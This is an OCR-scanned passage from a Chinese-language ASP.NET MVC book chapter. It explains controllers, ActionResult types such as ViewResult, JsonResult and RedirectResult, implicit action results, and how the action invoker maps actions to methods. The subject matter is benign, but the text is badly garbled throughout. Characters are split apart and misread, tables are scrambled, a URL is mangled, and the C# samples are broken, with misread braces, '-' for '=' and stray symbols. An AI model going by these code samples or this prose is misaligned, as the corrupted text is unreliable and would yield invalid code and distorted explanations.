尽管 已 在 第 13 章 中 讨论 过 使 用 请 求 /响应 数据 的 过 滤 和 工作 方式 ， 可 以 从 ASPNET MVC 的 
操作 过 滤器 基础 设施 中 获 益 ， 但 是 ControllerBase 类 非常 轻便 ， 它 能 使 开发 人 员 为 他 们 自己 的 
控制 器 提供 强大 的 自 定义 实现 。 但 是 ， 它 没有 提供 把 操作 转换 为 方法 调用 的 能 力 。 这 正 是 引 
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入 Controller 类 的 原因 。 
16.7.3 ”控制 器 类 和 操作 


从 理论 上 讲 ， 实 现 ControllerBase 或 IController 接 口 的 类 已 经 足够 用 来 构建 网 站 。 路 由 通 
过 名 称 可 以 查找 一 个 IController 接 口 ， 然 后 调用 Execute 方 法 ， 这 样 我 们 就 得 到 了 一 个 非常 基 
本 的 网 站 。 

然而 , 这 种 做 法 类 似 于 在 ASPNET 开 发 中 使 用 原始 的 IHttpHandlers 一 一 尽管 它 可 以 使 用 ， 
但 我 们 是 在 做 白费 力 的 工作 一 一 探索 核心 框架 逻辑 。 

有 趣 的 是 , 正如 后 面 将 看 到 的 , ASPNET MVC 本 身 是 在 HTTP 处 理 程序 之 上 创建 的 一 层 ， 
从 总 体 上 来 看 没 必 要 探索 ASPNET 的 内 部 机 制 是 如 何 改变 而 实现 MVC 的 。 相 反 ，ASPNET 
MVC 是 开发 团队 在 现 有 ASPNET 扩 展 点 之 上 建立 的 新 框架 。 

编写 控制 器 的 标准 方法 是 让 它 继 承 System.Web.Mvc.Controller 抽 象 基 类 , 因为 该 基 类 继承 
了 ControllerBase 基 类 ， 并 实现 了 IController 接 口 。Controller 类 专门 设计 用 于 所 有 控制 器 的 基 
类 ， 因 为 它 为 派生 于 它 的 控制 器 提供 了 很 多 非常 好 的 行为 。 

图 16-15 中 展示 了 IController、ControllerBase 和 抽象 基 类 Controller 之 间 的 关系 以 及 
ASPNET MVC 5 应 用 程序 默认 提供 的 两 个 控制 器 。 
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操作 方法 


Controller 子 类 中 的 所 有 公共 方法 都 是 操作 方法 ， 它 们 可 以 通过 HTTP 请 求 进 行 调用 。 我 
们 可 以 把 控制 器 分 解 成 多 个 操作 方法 ， 每 个 操作 方法 对 应 于 一 个 具体 的 用 户 输入 ， 而 不 是 
Execute 方 法 的 一 个 单 片 (monolithic) 实 现 。 


产品 小 组 的 话 


当 读 到 Controller 类 的 每 一 个 公共 方法 都 可 以 从 Web 中 调用 后 ， 我 们 可 能 直觉 地 认为 该 方 
法 存在 安全 性 问题 。 产 品 小 组 针对 该 问题 也 进行 了 多 次 辩论 。 

最 初 ， 每 个 操作 方法 要 求 ControllerActionAttribute 特 性 应 用 于 每 个 可 调用 方法 。 然 而 ， 许 
多 人 觉得 这 违背 了 DRY(Don'tRepeat Yourself) ll, 事实 证明 , 对 这 些 方法 Web 可 调用 特性 的 
关注 与 对 选择 的 意义 存在 分 歧 有 关 。 

对 于 产品 小 组 来 说 ， 在 一 个 方法 是 Web 可 调用 之 前 就 会 存在 多 层级 选择 。 需 要 选择 的 第 
一 层级 是 一 个 ASPNET MVC 项 目 。 如 果 向 一 个 标准 的 ASPNET Web Application 项 目 中 添加 一 
个 公共 Controller 类 ， 那 么 该 类 并 非 立即 就 是 Web 可 调用 的 (尽管 向 ASPNET MVC 项 目 中 添加 该 
类 使 它 可 调用 )。 我 们 仍 需要 使 用 与 该 类 相关 的 路 由 处 理 程序 (如 MvcRouteHandler) 来 定义 一 个 
路 由 。 

这 里 普遍 接受 的 是 ， 我 们 可 以 通过 继承 Controller 类 来 选择 这 一 行为 。 我 们 不 能 偶然 这 样 
做 。 即 便 这 样 做 了 ， 我 们 仍 需要 定义 与 该 类 相关 的 路 由 。 


16.7.4 ActionResult 


如 前 所 述 ，MVC 模 式 中 控制 器 的 作用 是 响应 用 户 输入 。 在 ASPNET MVC 中 ， 操 作 方 法 
是 响应 用 户 输 入 的 基本 单位 。 操 作 方 法 最 终 负责 处 理 用 户 请 求 ， 并 输出 显示 给 用 户 的 响应 ， 
响应 内 容 通 常 是 HTML 标 记 。 

操作 方法 遵循 的 模式 是 执行 请 求 它 做 的 任务 ， 最 后 返回 ActionResult 抽 象 基 类 的 一 个 实 
例 。 

ActionResult 抽 象 基 类 的 源 代码 如 下 : 

public abstract class ActionResult 

{ 


public abstract void ExecuteResult (ControllerContext context); 
} 


注意 ，ActionResult 类 中 只 包含 方法 ExecuteResult。 如 果 熟 悉 Command Pattern， 那 么 也 应 
该 熟悉 ActionResult。 操 作 结果 代表 操作 方法 想 让 框架 执行 的 命令 。 

操作 结果 通常 用 于 框架 级 别 的 处 理 ， 而 操作 方法 主要 用 来 处 理应 用 程序 逻辑 。 例 如 ， 当 
进入 的 请 求 要 求 显示 一 个 产品 列表 时 ， 操 作 方 法 会 查询 数据 库 ， 并 将 正确 的 产品 汇聚 成 一 个 
列表 来 显示 。 它 可 能 需要 根据 应 用 程序 中 的 业务 规则 执行 一 些 过 滤 。 此 时 ， 操 作 方法 完全 用 
于 处 理应 用 程序 逻辑 。 

然而 ， 该 方法 一 旦 准备 好 给 用 户 显示 产品 列表 ， 我 们 可 能 不 希望 让 关注 于 视图 逻辑 的 代 
码 来 担心 框架 提供 的 实现 细节 ， 比 如 直接 写 入 HTTP 响 应 流 。 或 许 我 们 有 一 个 知道 如 何 把 产 
品 集 格式 化 为 HIML 标 记 的 模板 。 我 们 宁愿 不 把 这 些 信息 封装 在 操作 方法 中 ， 因 为 这 样 会 违 
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背 关 注 点 分 离 的 原则 。 

我 们 使 用 的 一 项 技术 是 让 操作 方法 返回 一 个 ViewResult( 派 生 于 ActionResulb 对 象 ， 并 把 
数据 赋 给 该 对 象 实例 ， 然 后 返回 该 实例 。 在 这 一 点 上 ， 操 作 方 法 处 理 它 的 工作 ， 而 操作 调用 
者 将 要 调用 ViewResult 实 例 上 的 ExecuteResult 方 法 ， 剩余 的 工作 由 ExecuteResult 方 法 来 做 。 代 
码 如 下 : 

public ActionResult ListProducts () 


t 

//Pseudo code 

IList«Product» products - SomeRepository.GetProducts(); 
ViewData.Model = products; 

return new ViewResult (ViewData = this.ViewData ); 

} 


在 实践 中 ， 我 们 可 能 从 没有 看 到 像 这 样 直接 实例 化 ActionResult 对 象 的 代码 。 相 反 ， 我 们 
通常 会 使 用 Controller 类 中 一 个 辅助 方法 ， 比 如 像 下 面 的 View 方 法 : 


public ActionResult ListProducts () 


{ 

//Pseudo code 

IList«Product» products = SomeRepository.GetProducts(); 
return View (products); 

) 


接 下 来 将 深入 讲解 ViewResult， 并 分 析 它 是 如 何 关联 视图 的 。 
1. 操作 结果 辅助 方法 


如 果 仔 细 看 默认 ASPNET MVC 项 目 模板 中 的 默认 控制 器 操作 方法 ， 就 会 发 现 操作 方法 
不 会 直接 实例 化 ViewResult 对 象 。 例 如 ， 下 面 About 方 法 的 源 代码 : 
public ActionResult About() ( 


ViewData["Title"] = "About Page"; 
return View(); 


) 


请 注意 ，About 方 法 返回 了 View 方 法 调用 的 结果 。Controller 类 包含 了 一 些 返 回 
ActionResult 实 例 的 简便 方法 。 这 些 方法 旨 在 帮助 操作 方法 的 实现 更 具 可 读 性 和 说 明 性 。 通 常 
都 是 返回 这 些 简便 方法 调用 的 结果 ， 而 不 是 一 个 新 的 操作 结果 实例 。 

这 些 方 法 通常 根据 返回 的 操作 结果 类 型 来 命名 ， 省 去 其 中 的 Result 后 级 。 因 此 ，View 方 
法 返回 一 个 ViewResult 的 实例 。 同 样 ，Json 方 法 返回 一 个 JsonResult 的 实例 。 但 是 有 一 个 特殊 
情况 就 是 RedirectToAction 方 法 ， 它 返回 的 是 RedirectToRoute 的 一 个 实例 而 不 是 
RedirectToActionResult 的 实例 。 

Redirect、RedirectToAction 和 RedirectToRoute 方 法 都 发 送 HTTP 302 状 态 码 ， 表 明 一 个 临 
时 的 重 定向 。 当 内 容 永久 移 除 时 ， 我 们 想 告知 客户 端 ， 我 们 正在 使 用 HTTP 301 状 态 码 。 这 样 
做 的 一 个 主要 好 处 是 搜索 引擎 优化 。 当 遇 到 HTTP 301 状 态 码 时 ， 搜 索引 擎 会 更 新 搜索 结果 中 
显示 的 URL; 更 新 过 期 的 链接 通常 也 对 搜索 引擎 排名 有 一 定 的 影响 。 出 于 这 个 原因 ， 返 回 
RedirectResult 的 每 个 方法 都 对 应 一 个 返回 HTTP 301 状 态 码 的 方法 ， 它 们 分 别 是 
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RedirectPermanent、RedirectToActionPermanent 和 RedirectToRoutePermanent。 注 意 ， 浏 览 器 和 


他 客户 端 都 会 缓存 HTTP 301 响 应 ， 因 此 ， 我 们 不 应 该 使 用 这 些 响 应 信息 ， 除 非 确定 重 定向 
是 永久 的 。 
表 16-4 列 举 了 现 有 方法 及 其 返回 类 型 。 


表 16-4 ”返回 ActionResult 实 例 的 控制 器 方法 


5 法 DRESS 
Redirect 返回 一 个 RedirectResult 对 象 ， 把 用 户 重 定向 到 一 个 合适 的 URL 
RedirectPermanent 与 Redirect 一 样 ， 但 它 返回 一 个 把 Pemmanent 属 性 设置 为 tme 的 

RedirectResult， 因 此 ， 返 回 一 个 HTTP 301 状 态 码 
RedirectToAction 返回 一 个 RedirectToRouteResult 对 象 ， 根 据 提供 的 路 由 值 把 用 户 重 定向 到 


-个 操作 方法 


RedirectToActionPermanent 


RedirectToRoute 


RedirectToRoutePermanent 


View 
PartialView 
Content 
File 

Json 


JavaScript 


2. 操作 结果 类 型 


与 RedirectToAction 一 样 ， 但 它 返 回 一 个 把 Permanent 属 性 设置 为 te 的 
RedirectResult， 因 此 ， 返 回 一 个 HTTP 301 状 态 码 
返回 一 个 RedirectToRouteResult 对 象 ， 把 用 户 重 定向 到 
URL 

与 RedirectToRoute 一 样 ， 但 它 返 回 一 个 把 Permanent 属 性 设置 为 tue 的 
RedirectResult， 因 此 ， 返 回 一 个 HTTP 301 状 态 码 


匹配 指定 路 由 值 的 


返回 一 个 ViewResult 对 象 ， 向 响应 流 中 泻 染 一 个 视图 

返回 一 个 PartialViewResult 对 象 ， 向 响应 流 中 泻 染 一 个 部 分 视图 

返回 一 个 ContentResult 对 象 ， 向 响应 流 中 编写 指定 的 内 容 ( 字 符 串 ) 
返回 一 个 派生 自 FileResult 的 类 ， 向 响应 流 中 编写 二 进 制 内 容 

返回 一 个 JsonResult 对 象 ， 其 中 包含 将 一 个 对 象 序列 化 为 JSON 的 输出 
返回 一 个 JavaScriptResult 对 象 ， 其 中 包含 当 返 回 到 客户 端 就 立即 执行 的 


JavaScript 代 码 


ASPNET MVC 包 含 一 些 执行 常见 任务 的 ActionResult 类 型 。 表 16-5 列 举 了 这 些 类 型 。 后 


i 会 对 每 一 种 类 型 进行 详细 介绍 。 


表 16-5 ”ActionResult 类 型 描述 


ActionResult 类 型 描述 
ContentResult 直接 把 指定 内 容 作 为 文本 编写 到 响应 流 中 
EmptyResult 代表 一 个 null 或 空 响应 ， 不 做 任何 处 理 
FileContentResult 派生 于 FileResult 类 ， 向 响应 流 中 编写 一 个 字 节 数组 
FilePathResult 派生 于 FileResult 类 ， 根 据 文件 路 径 向 响应 流 中 编写 一 个 文件 
FileResult 作为 一 组 向 流 中 编写 一 个 二 进 制 响应 的 结果 的 基 类 。 用 来 将 文件 返回 给 用 户 
FileStreamResult 自 FileResult 类 ， 向 响应 中 编写 一 个 流 
HttpNotFound 派生 自 HttpStatusCodeResult 类 。 给 客户 端 返回 一 个 指示 找 不 到 请 求 资源 的 
HTTP 404 响 应 代码 
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( 续 表 ) 
ActionResult 类 型 dü x 
HttpStatusCodeResult 返回 一 个 用 户 指定 的 HTTP 代 码 
HttpUnauthorizedResult | ”派生 于 HttpStatusCodeResult 类 。 向 客户 端 返 回 一 个 HTTP 401 响 应 代码 ， 表 明 
请 求 者 在 请 求 的 URL 中 没有 请 求 资源 的 授权 


JavaScriptResult 用 来 在 客户 端 立即 执行 从 服务 器 返回 的 JavaScript 代 码 

JsonResult 将 给 定 对 象 序列 化 为 JSON， 并 向 响应 流 中 编写 该 JSON， 通 常用 于 响应 Ajax 
请 求 

PartialViewResult 类 似 于 ViewResult 对 象 , 它 向 响应 流 中 泻 染 一 个 部 分 视图 , 通常 用 于 响应 Ajax 
请 求 

RedirectResult 根据 Boolean 类 型 的 Permanent 标记 ， 返 回 一 个 临时 的 重 定向 编码 302 或 永久 的 


重 定向 编码 301， 把 请 求 者 重 定 向 到 另 一 个 URL 

RedirectToRouteResult | 类 似 于 RedirectResult， 但 是 它 把 用 户 重 定向 到 一 个 通过 路 由 参数 指定 的 
URL 
ViewResult 调用 视图 引擎 来 向 响应 流 中 泻 染 一 个 视图 


ContentResult 

ContentResult 通 过 Content 属 性 将 它 指定 的 内 容 编 写 到 响应 流 中 。 它 也 允许 通过 
ContentEncoding 属 性 指定 内 容 编 码 方式 ， 通 过 ContentType 属 性 指定 内 容 类 型 。 

如 果 没 有 指定 编码 方式 ， 就 使 用 当前 HttpResponse 实 例 的 内 容 编 码 方式 。HttpResponse 
的 默认 编码 方式 在 web.config 文 件 的 全 局 化 元 素 中 指定 。 

同样 ， 如 果 不 指 定 内 容 类 型 ， 也 将 使 用 当前 HttpResponse 实 例 的 内 容 类 型 。HttpResponse 
默认 的 内 容 类 型 是 text/html。 


EmptyResult 

顾名思义 ，EmptyResult 用 来 指示 框架 将 不 做 任何 处 理 。 这 是 遵照 一 个 称 为 空 对 象 模式 
(Null Object pattern) 的 设计 模式 ， 它 用 一 个 实例 蔡 换 null 引 用 。 在 这 个 实例 中 ，ExecuteResult 
方法 有 一 个 空 实现 。 这 种 设计 模式 在 Martin Fowler 的 书籍 Refactoring: Improving the 
Design of Existing Code(Addison-Wesley 出 版 ，1999) 一 一 中 引入 。 想 了 解 该 设计 模式 的 更 多 内 
容 ， 请 登录 网 址 http://martinfowler.conybliki/refactoring.html。 


FileResult 

除了 用 来 向 响应 流 中 编写 二 进 制 内 容 ( 比 如 磁盘 上 的 Microsoft Word 文 档 或 SQL Server 中 
blob 列 的 数据 ) 之 外 ，FileResult 类 与 ContentResult 类 非常 类 似 。 设 置 结果 上 的 File- 
DownloadName 属 性 将 为 Content-Disposition 头 部 (header) 设 置 一 个 合适 的 值 ， 从 而 可 以 给 用 户 
呈现 一 个 文件 下 载 对 话 框 。 

FileResult 是 以 下 3 个 不 同文 件 结果 类 型 的 抽象 基 类 : 

e FilePathResult 

e FileContentResult 

e FileStreamResult 

它们 的 使 用 通常 是 遵照 工厂 模式 , 也 就 是 根据 具体 调用 的 File 重 载 方 法 (后 面 会 介绍 ) 决 定 
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返回 哪个 具体 类 型 。 


HttpStatusCodeResult 

HttpStatusCodeResult 提 供 了 一 种 使 用 一 个 具体 的 HTTP 响 应 状态 码 和 描述 来 返回 操作 结 
果 的 方式 。 例如， 为 了 通知 请 求 者 一 个 资源 永久 不 可 用 ， 可 以 返回 一 个 410( 消 失 )HTTP 状 态 码 。 
假如 已 经 果断 决定 我 们 的 商店 停止 销售 disco 专 辑 ， 那 么 我 们 可 以 更 新 StoreController 控 制 器 的 
Browse 操 作 ， 让 其 返回 一 个 410 HTTP 代 码 (如 果 有 用 户 搜索 disco 的 话 )。 


public ActionResult Browse(string genre) 


{ 
if (genre.Equals ("disco",StringComparison.InvariantCultureIgnoreCase)) 


return new HttpStatusCodeResult (410) ; 
var genreModel = new Genre ( Name = genre ]; 
return View (genreModel); 
H 
根据 常见 的 HTTP 状 态 码 ， 可 以 分 为 5 个 具体 的 ActionResult， 正 如 表 16-5 中 列举 的 那样 : 
HttpNotFoundResult 
HttpStatusCodeResult 
HttpUnauthorizedResult 
RedirectResult 
RedirectToRouteResult 
tH, RedirectResult 和 RedirectToRouteResult( 后 面 会 介绍 ) 依 据 的 是 HTTP 301 和 HTTP 302 


响应 码 。 

JavaScriptResult 

JavaScriptResult 用 来 在 客户 端 执行 服务 器 返回 的 JavaScript 代 码 。 例 如 , 当 使 用 内 置 的 Ajax 
辅助 方法 请 求 一 个 操作 方法 时 , 该 方法 就 会 返回 一 段 可 以 在 客户 端 立即 执行 ( 当 它 到 达 客 户 端 
时 ) 的 JavaScript 代 码 : 


public ActionResult DoSomething() { 
script s = "$('£some-div').html('Updated!');"; 


return JavaScript(s); 
t 


可 以 通过 如 下 代码 调用 上 面 的 方法 : 
«$: Ajax.ActionLink("click", "DoSomething", new AjaxOptions()) $» 
«div id-"some-div"»«/div» 


这 里 假设 已 经 引用 了 Ajax 库 和 jQuery。 


JsonResult 

JsonResult 使 用 JavaScriptSerializer 类 把 它 的 内 容 (通过 Data 属 性 指定 ) 序 列 化 为 
JSON(JavaScript Object Notation) 格 式 。 这 对 于 需要 操作 方法 返回 JavaScript 容 易 处 理 格式 的 数 
据 的 Ajax 方案 是 有 用 的 。 

与 ContentResult 类 似 ，JsonResult 的 内 容 编 码 方式 和 内 容 类 型 也 都 可 以 通过 属性 来 设置 。 
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仅 有 的 区 别 是 默认 的 ContentType 是 application/json 而 不 是 text/html。 

注意 JsonResult 是 序列 化 整个 对 象 图 。 因 此 ， 如 果 给 它 一 个 包含 20 个 Product 实 例 的 
ProductCategory 对 象 ， 那 么 每 个 Product 实 例 也 将 被 序列 化 并 包含 在 JSON 中 发 送 到 响应 流 中 。 
现在 想象 一 下 ， 每 个 Product 对 象 又 有 一 个 包含 20 个 Order 实 例 的 Orders 集 合 。 正 如 想象 的 ， 
JSON 响 应 会 迅速 增长 。 

目前 还 没有 办 法 能 够 限制 序列 化 到 JSON 中 的 数据 量 , 因此 , 包含 有 大 量 属性 和 集合 的 对 
象 (比如 那些 通过 LINQ 转 化 到 SQL 时 生成 的 对 象 ) 要 序列 化 为 JSON 是 个 很 棘手 的 问题 。 针 对 这 
一 问题 ， 推 荐 的 方法 是 创建 一 个 新 类 型 ， 其 中 包含 的 信息 与 想 在 JsonResult 中 包含 信息 一 样 。 
这 种 情况 下 ， 匿 名 类 型 能 够 派 上 用 场 。 

例如 ， 在 上 述 情形 中 ， 不 是 序列 化 ProductCategory 的 一 个 实例 ， 而 是 使 用 一 个 匿名 对 象 
初始 化 器 来 传递 需要 的 数据 ， 代 码 示例 如 下 : 


public ActionResult PartialJson() 
{ 


var category = new ProductCategory ( Name-"Partial"]; 
var result - new ( 
Name = category.Name, 
ProductCount - category.Products.Count 
u 
return Json(result); 
F 
在 这 个 示例 中 ， 所 有 需要 的 信息 是 类 别名 称 和 该 类 别 中 的 产品 数量 。 我 们 是 从 实际 对 象 
中 拉 取 这 些 需 要 的 信息 ， 并 把 它们 存储 在 一 个 名 为 result 的 匿名 类 型 实例 中 ,然后 序列 化 该 匿 
名 类 型 实例 ， 而 不 是 序列 化 整个 对 象 图 。 我们 最 后 把 序列 化 后 的 result 实 例 发 送 到 响应 流 ， 而 
不 是 发 送 整个 对 象 图 。 这 个 方法 的 另 一 个 好 处 是 ， 我 们 不 会 在 不 经 意 间 序 列 化 不 想 在 客户 端 
显示 的 数据 ， 比 如 任何 内 部 产品 代码 、 库 存量 和 供应 商 信息 等 。 


RedirectResult 

RedirectResult 执 行 一 个 (通过 Url 属 性 设置 的 ) 到 指定 URL 的 HTTP 重 定向 。 在 内 部 , 该 结果 
调用 HttpResponse.Redirect 方 法 来 把 HTTP 状 态 码 设置 成 HTTP/1.1 302 Object Moved. 从 而 使 得 
浏览 器 为 指定 的 URL 立 即 发 出 新 的 请 求 。 

从 技术 角度 看 ， 我 们 可 以 在 操作 方法 中 直接 调用 Response.Redirect 方 法 ， 但 是 使 用 
RedirectResult 方 法 会 把 这 个 操作 推迟 到 操作 方法 完成 它 的 处 理 之 后 。 这 对 于 单元 测试 操作 方 
法 和 帮助 将 基本 框架 细节 保持 在 操作 方法 外 部 是 有 用 的 。 


RedirectToRouteResult 

RedirectToRouteResult 执 行 HITP 重 定向 的 方式 类 似 于 RedirectResult， 但 不 同 的 是 它 不 直 
接 指 定 URL， 而 使 用 Routing API 来 决定 重 定向 到 的 URL。 
注意 表 16-4 定 义 了 返回 该 类 型 结果 的 两 个 简便 方法 : RedirectToRoute 和 RedirectToAction。 
正如 前 面 讨 论 的 ， 有 三 个 额外 的 方法 可 以 返回 HTIP 301( 永 久 删 除 ) 状 态 码 : 
RedirectPermanent, RedirectToActionPermanentfilRedirect ToRoutePermanent.. 
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ViewResult 

ViewResult 是 使 用 最 广泛 的 操作 结果 类 型 。 它 调用 IViewEngine 实 例 中 的 FindView 方 法 ， 
并 返回 一 个 IView 实 例 ， 然 后 再 调用 IView 实 例 上 的 Render 方 法 ， 该 方法 用 来 向 响应 流 中 泻 染 
输出 内 容 。 一 般 情况 下 ， 这 会 向 格式 化 显示 数据 的 视图 模板 中 插入 指定 的 视图 数据 ( 即 操作 方 
法 准备 在 视图 中 显示 的 数据 )。 


PartialViewResult 

PartialViewResult 的 工作 方式 几乎 和 ViewResult 一 样 ， 除 了 它 是 调用 FindPartialView 方 法 
(而 不 是 FindView 方 法 ) 来 定位 视图 。 它 主要 用 来 泻 染 部 分 视图 ， 因 此 ， 在 使 用 Ajax 技术 把 新 
的 HTML 更 新 到 部 分 页 面 的 部 分 更 新 情形 中 ， 它 是 非常 有 用 的 。 


3. 隐 式 操作 结果 


一 般 情 况 下 ，ASPNET MVC 和 软件 开发 中 一 个 永恒 不 变 的 目标 ， 就 是 要 尽 可 能 明确 代 
码 的 意图 。 假 如 有 一 个 非常 简单 的 操作 方法 ， 只 用 来 返回 一 小 段 数据 。 在 这 种 情形 下 ， 让 操 
作 方 法 的 签名 反映 它 返回 的 信息 是 很 有 帮助 的 。 

为 了 突出 这 一 点 ， 考 虑 一 个 计算 两 点 之 间距 离 的 Distance 方 法 。 该 操作 可 以 直接 写 入 响 
应 流 中 一 一 正如 第 2 章 2.3.2 节 中 的 第 一 个 控制 器 操作 所 示 。 然 而 ,， 返回 一 个 值 的 操作 也 可 以 写 
成 如 下 形式 : 

public double Distance(int xl, int yl, int x2, int y2) 

t 

double xSquared Math.Pow(x2 - xl, 2); 
double ySquared Math.Pow(y2 - yl, 2); 


return Math.Sqrt(xSquared + ySquared); 
) 


注意 ， 上 面 方法 的 返回 类 型 是 double 而 不 是 派生 于 ActionResult 的 类 型 。 这 是 完全 可 以 接 
受 的 。 当 ASPNET MVC 调 用 该 方法 ， 并 发 现 返 回 类 型 不 是 一 个 ActionResult 时 ， 它 会 自动 创 
建 一 个 包含 该 操作 方法 结果 的 ContentResult， 并 在 内 部 作为 ActionResult 使 用 。 

要 牢记 一 件 事 ，ContentResult 要 求 一 个 字符 串 值 ， 所 以 操作 方法 的 结果 需要 首先 转换 成 
一 个 字符 串 。 为 此 ， 在 它 传递 到 ContentResult 以 前 ，ASPNET MVC 会 使 用 InvariantCulture 调 
用 结果 上 的 ToString 方 法 。 如 果 需 要 根据 特定 的 区 域 格式 化 结果 ， 就 应 该 明确 地 返回 一 个 
ContentResult。 

最 后 ， 上 面 的 方法 大 致 等 价 于 下 面 的 方法 : 

public ActionResult Distance(int xl, int yl, int x2, int y2) 

í double xSquared = Math.Pow (x2 - xl, 2); 

double ySquared = Math.Pow (y2 - yl, 2); 
double distance = Math.Sqrt(xSquared + ySquared); 
return Content (Convert ToString (distance, 


CultureInfo.InvariantCulture)); 
} 


第 一 种 方法 的 优势 是 它 使 得 我 们 的 意图 更 加 清晰 ， 更 便于 对 方法 进行 单元 测试 。 
表 16-6 列 出 了 当 编写 没有 ActionResult 返 回 类 型 的 操作 方法 时 期 望 的 各 种 隐 式 约定 。 
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表 16-6 ”操作 方法 的 隐 式 约定 


i mH 值 描 xk 
Null 操作 调用 器 用 EmptyResult 的 一 个 实例 蔡 换 null 结 果 。 这 是 采用 了 空 对 象 模式 。 因此， 
编写 自 定义 操作 过 滤器 时 不 必 担 心 null 操 作 结果 
Void 操作 调用 器 把 操作 方法 作为 返回 null 处 理 ， 因 此 返回 EmptyResult 对 象 
其 他 不 派生 自 操作 调用 器 使 用 InvariantCulture 调 用 对 象 的 ToString 方 法 ， 然 后 把 结果 字符 串 封装 
ActionResult 的 对 象 | 到 ContentResult 实 例 中 


注意 ”创建 ContentResult 实 例 的 代码 被 封装 在 操作 调用 器 上 一 个 称 为 
CreateActionResult 的 虚拟 方法 中 .对 于 想 返 回 一 个 不 同 隐 式 操作 结果 类 型 的 开发 
人 员 , 可 以 编写 一 个 消费 者 操作 调用 器 , 该 调用 器 需要 继承 ControllerActionInvoker 
类 ， 并 重 写 其 中 的 CreateActionResult 方 法 。 
一 个 示例 可 能 是 让 JsonResult 自 动 封装 从 操作 方法 返回 的 值 。 


16.7.5 ”操作 调用 器 


本 章 前 面部 分 已 经 多 次 引用 操作 调用 器 , 而 没有 对 它 作 出 任何 解释 。 本 节 将 介绍 ASPNET 
MVC 请 求 处 理 链 中 一 个 关键 元 素 的 作用 。 该 元 素 调用 请 求 调 用 的 操作 ， 它 就 是 操作 调用 器 。 
本 章 前 面 第 一 次 定义 控制 器 时 ， 介 绍 了 路 由 把 URL 映 射 到 Controller 类 上 的 某 一 个 操作 方法 的 
工作 原理 。 进 一 步 深层 地 学 习 ， 会 发 现 其 实 路 由 本 身 没有 把 任何 内 容 映 射 到 控制 器 操作 ， 它 
们 只 是 解析 了 输入 的 请 求 ， 并 填充 了 存储 在 当前 RequestContext 中 的 一 个 RouteData 实 例 。 

通过 Controller 类 上 的 ActionInvoker 属 性 设置 的 ControllerActionInvoker 负 责 根据 当前 请 求 
上 下 文 调用 控制 器 上 的 操作 方法 。 该 调用 器 执行 以 下 任务 : 
定位 要 调用 的 操作 方法 。 
通过 使 用 模型 绑 定 系统 为 操作 方法 的 参数 获取 值 。 
调用 操作 方法 以 及 它 的 所 有 过 滤器 。 
调用 操作 方法 返回 的 ActionResult 上 的 ExecuteResult 方 法 。 对 于 不 返回 ActionResult 的 
方法 ， 调 用 器 会 创建 一 个 隐 式 操作 结果 (正如 前 一 节 描 述 的 )， 并 调用 该 隐 式 操作 结果 
上 的 ExecuteResult 方 法 。 

下 一 节 会 详细 介绍 调用 器 定位 一 个 操作 方法 的 工作 原理 。 


1. 一 个 操作 如 何 被 映射 到 一 个 方法 


ControllerActionInvoker 查 看 与 当前 请 求 上 下 文 相关 的 路 由 值 字典 ， 以 查找 对 应 于 操作 键 
的 值 。 作 为 一 个 例子 ， 下 面 是 默认 路 由 的 URIL 模 式 : 

{controller}/{action}/{id} 

当 进入 的 请 求 匹配 该 路 由 时 ， 我 们 根据 该 路 由 填充 一 个 路 由 值 的 字典 (可 以 通过 
RequestContext 访 问 )。 例 如 ， 如 果 进 入 的 请 求 是 : 
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/home/list/123 


路 由 会 把 带 有 操作 键 的 值 列表 添加 到 路 由 值 字典 中 。 

此 时 ， 操 作 只 是 从 请 求 的 URL 中 提取 的 一 个 字符 串 ; 而 不 是 一 个 方法 。 提 取 的 字符 串 表 
示 应 该 处 理 相应 请 求 的 操作 名 称 。 尽 管 它 通常 是 由 一 个 方法 表示 ， 但 是 真正 的 操作 是 一 个 提 
象 概念 。 对 于 一 个 操作 名 称 可 能 有 多 个 方法 与 其 对 应 。 或 者 它 甚 至 可 能 不 是 一 个 方法 而 是 一 
个 工作 流 或 其 他 的 一 些 能 够 处 理 操作 的 机 制 。 

操作 调用 器 的 关键 点 是 : 尽管 操作 通常 映射 到 一 个 方法 ， 但 是 调用 器 不 需要 。 本 章 后 面 
讨论 每 个 操作 对 应 两 个 方法 的 异步 操作 时 会 看 到 一 个 这 样 的 例子 。 

操作 方法 选择 

调用 器 一 旦 确定 了 操作 的 名 称 ， 就 会 尝试 找 出 与 该 操作 对 应 的 方法 。 默 认 情 况 下 ， 调 有 
器 使 用 反射 在 派生 自 Controller 类 的 子 类 上 查找 与 当前 操作 同名 (不 区 分 大 小 写 ) 的 公共 方法 。 
找到 的 方法 必须 满足 以 下 条 件 : 

e. 必须 没有 定义 NonActionAttribute。 

o 操作 方法 不 能 是 特殊 的 方法 ， 比 如 构造 函数 、 属 性 访问 器 和 事件 访问 器 等 。 

e 最 初 在 Object 上 定义 的 方法 (如 ToSting) 或 在 Controller 上 定义 的 方法 (如 Dispose 或 

View) 不 能 是 操作 方法 。 

与 许多 ASPNET MVC 特 性 一 样 ， 我 们 根据 应 用 程序 的 特殊 需要 调整 这 些 默 认 行 为 。 

ActionNameAttribute 

把 ActionNameAttribute 特 性 应 用 于 一 个 方法 允许 我 们 指定 该 方法 处 理 的 操作 。 例 如 ， 想 
要 有 一 个 名 为 View 的 方法 ， 然 而 ， 它 和 Controller 类 中 内 置 的 View 方 法 冲突 ， 该 Controller 类 的 
View 方 法 用 于 返回 ViewResult。 解 决 这 个 问题 的 一 个 简单 方法 是 编写 如 下 代码 : 


[ActionName ("View")] 

public ActionResult ViewSomething(string id) 
{ 

return View(); 

) 


ActionNameAttribute 特 性 把 该 操作 的 名 称 重 定 义 为 View。 因 此 ， 这 个 方法 可 以 被 调用 以 
响应 请 求 /home/view， 而 不 响应 /home/viewsomething。 在 后 一 种 情况 下 ， 对 于 操作 调用 器 而 
言 ， 名 为 ViewSomething 的 操作 方法 不 存在 。 

使 用 ActionNameAttribute 特 性 的 一 个 后 果 是 : 如 果 使 用 传统 的 方法 来 定位 操作 对 应 的 视 
， 那 么 定位 到 的 视图 应 该 以 该 操作 的 名 称 命名 ， 而 不 是 以 方法 的 名 称 命名 。 在 前 面 的 示例 
中 (假设 这 是 一 个 HomeController 的 方法 ), 我 们 应 该 默认 查找 视图 ~/Views/Home/View. cshtml。 

ActionNameAttribute 特 性 对 一 个 操作 方法 来 说 不 是 必需 的 。 这 里 有 一 个 隐 式 的 规则 ， 如 
果 不 使 用 该 特性 的 话 ， 操 作 方 法 的 名 称 就 是 操作 的 名 称 。 


ActionSelectorAttribute 

现在 我 们 尚未 完成 操作 匹配 到 方法 的 过 程 。 一旦 确定 了 匹配 当前 操作 名 称 的 Controller 类 
